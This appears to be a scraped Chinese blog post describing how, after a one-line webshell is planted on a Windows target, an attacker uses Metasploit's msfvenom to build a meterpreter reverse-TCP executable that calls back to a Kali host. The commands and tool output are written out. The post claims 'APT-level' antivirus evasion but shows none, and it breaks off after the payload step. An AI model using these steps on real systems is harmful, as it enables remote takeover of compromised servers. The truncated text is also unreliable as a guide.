现在情况是已经上传了一句话木马,可以执行如:ls、pwd、whoami等命令;不管是python、bash 还是 perl 都反弹不了, 偷不了懒了,就上 msf 吧。
一、windows一句话木马反弹shell思路
前提:目标在有webshell权限下,利用kali的msf制作木马反弹shell过程。
启动kali中的msf
┌──(root@SC)-[~]
└─# msfconsole
生成exe类型反弹型木马,LHOST=kali 的 ip。
msf6 > msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.173.4 LPORT=4444 -f exe -o shell.exe
[*] exec: msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.173.4 LPORT=4444 -f exe -o shell.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
最后
以上就是缥缈发箍最近收集整理的关于APT级全面免杀拿Shell的全部内容,更多相关APT级全面免杀拿Shell内容请搜索靠谱客的其他文章。
本图文内容来源于网友提供,作为学习参考使用,或来自网络收集整理,版权属于原作者所有。
发表评论 取消回复